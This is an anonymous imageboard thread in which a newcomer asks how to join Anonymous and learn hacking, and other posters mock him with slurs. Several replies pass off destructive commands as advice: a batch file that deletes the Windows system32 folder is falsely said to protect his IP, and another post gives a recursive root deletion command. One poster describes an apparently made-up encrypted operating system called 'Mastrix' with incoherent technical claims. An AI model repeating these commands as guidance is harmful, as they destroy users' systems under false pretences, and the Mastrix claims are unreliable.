I just got done watching the anonymous documetary on youtube. It said this is where you guys hangout

I just got done watching the anonymous documetary on youtube. It said this is where you guys hangout.

how do i sign up for anonymous? will you guys teach me how to hack?

Newfag

Cool b8 faggot

what is newfag and b8

Lurk more

what is Lurk more??

Alright op, before we get started, you have to make sure you keep the authorities off your back.
First
>Make a new notepad file
type this

@echo off
del c:\WINDOWS\system32

then save this file as clover.bat (Not as a text file, but as all files)
Then open the file, this will protect your IP from being traced down.
Then you can come back and ask us for lessons about coding.

start by deleting system 32 microsoft uses this to spy on you

I already did all that guys it emptied windows for me and i installed kali linux

good,now kys faggot

Shit, you're not on windows?
We can only pull these things on windows, Apple and Linux's systems are way harder to avoid detection in

>Apple and Linux's systems are way harder to avoid detection in

t. tech illiterate faggot

sudo rm -rf --no-preserve-root */*

Newfags

You ain't ready for this shyt, Sup Forumsis where the big boyz hang Gtfo out rookie

I already learnt HTML and CSS guys what else do I need i'm also learning kali linux tools

Look retard this is how anonymous works: You, a pathetic 14 year old sperge buy one of the trademarked Guy Fawkes masks from V for Vendetta and sit in front of your webcam making a video that calls out an injustice and threatens perpetrators of same with the wrath of "Anonymous". Upload the video and wait about 16 hrs for the internet to see it. By the end of 16 hrs either the mass of unwashed so called hacktivists will have reached a consensus that the subject is worthy of action or ignore you for being a zit popping idiot. If the latter occurs the assholes who control the "official" Anonymoose social media account will announce that you are not the "real" Anonymous. However if consesus is formed in those 16 or so hours and the internet agrees with the cause some real hackers will post tools that a mongoloid could use and thousands of script kiddies run the software and usually DDoS the targets online presence. If any of that garners mainstream media attention more real hackers will invole themselves with heavy kung fu and start stealing doccuments and data and sending it out to the tards that keep the social media accounts to leak. It's THAT simple. No vast conspiracies of Super Haxxors, just a bunch of script kiddies who allow their machines to join a botnet and commit mischief as a form of protest. Done. You are anonymous. If you make any real sense well educated people will help you fuck shit up. Nobody but nobody is going to try to teach some noob to be a haxxor. You either code and build your own tools or you use somebody elses as a script kiddie. Thats it. Thats all it is. No vast shadow organization at all, just a little crowd sourced mischief.

Anyone not using Mastrix Platform 3.6 with the cube encoder is pretty much being watched by the FBI, CIA, DHS, etc. ISPs keep a log of what websites each modem interacts with. This is nothing new, but typical surfacenet users simply don't know how to code Mastrix to develop their desktop.

you have to actually type code
ya see, our text is red because they're invalid codes
to make actual code, do something like this
>delete.parent(System32)
make sure it starts with > or it won't break

sudo apt install cmatrix
cmatrix

>done

Make sure to sign up for anonymous weekly newsletter. In it it'll tell you all of our schedules, tips and tricks. This week's edition tells us all about how "OP's a faggot"

Helped run the largest original user account on Twitter for a few years. Can confirm the DMs verify this as true. Lots of "check out this vid pls help me hack x company"

i install Sup Forums hacker so i can see all u guys IP address ha ha

You mean Mastrix, or cMatrix for Linux? Two different things.

Oh, I misread that. Thought you were trolling about the matrix.lol

Yea, if you're using one of the common known operating systems and not using encoding that simply can not be cracked within a decent time, you're playing the lottery here. One day a letter will come in the mail and two weeks later your shit gets taken into a warehouse and you go to prison to await trial. This is why I don't have a dumbass roommate anymore.

Care to share?

What the fuck is Mastrix?

>inb4 an OS made by the NSA

Kek.

>tailsOS/tor only on computer that isn't yours

That's the only way to go

Inb4 Mastrix isn't a thing.

shut the fuck you neet liar

An OS constructed to keep governments from knowing anything about you or your data connection. It literally operates on nothing but scrambled code. Runs like shit, looks like shit unless you want to invest forever into coding, but you will never get caught. I got my copy from a guy I worked with who was in prison 5 years for buying drugs online. He slipped me a copy on a mix cd with some vague instructions. I searched some shady shit and found there are several thousand people out there using various self made builds of it. Virus free, undetectable to ISPs, triple encrypted.

My dick isn't going to suck itself. Get over here.

Bullshit.

Sounds a lot like tor.

???

That's not how that works. All network traffic is detectable unless there's a truly encrypted connection, requiring both the sender and the recipient to auth with eachother. Even then, the syn ack synack occur in cleartext. Unless you're going through tor or i2p,which you're probably not, then you're just making shit up. Also "scrambled code" doesn't exist. It's probably base64 encoded bash and other langs compiled. Stop talking out your ass.

>scrambled code

kek

salkjfa;lshuasgsdioahjasf;kcljv

that's a scrambled sentence, can you read that?

No, just like a computer cannot read scrambled code.

That prisoner gave you his own OS, and he's spying on everything you do, dumbfuck.

No, to isn't an operating system.

So let's say you wanted to encrypt this sentence.

First you compress the data, assign new 32bit ascii to change each set of 4 bits to one of 128 ascii characters which change with GMT, then do a 256bit encryption. That's the basis of the operating system effectively. It taxes the shit out of processing and makes every operation unbearably stupid. Then, when transmitting data, it sends junk flinging all the fuck over the place. Incomprehensible garbage which filters through the web to randomly push data. I seriously can not tell you any specifics of it, but it is genius as much as insanity. No one would even bother to devote their time to find out a fragment of data.

Topkek

Hey, it may use the to Network or some smaller network, but all I know is, I look at files from my Mastrix computer and the same file on my windows computer and they are worlds apart. Mastrix ends up making a 1mb file into a 16mb file. Doesn't open with anything outside Mastrix, file names are 32 characters long in windows mostly symbols. Maybe some dickweed is watching me jerk to his parents wedding photos, maybe he gave me something legit. All I know it, it seems pretty fucking undetectable and there's a forum I can only access through my Mastrix computer. Other people are out there using it, but mostly people doing illegal shit.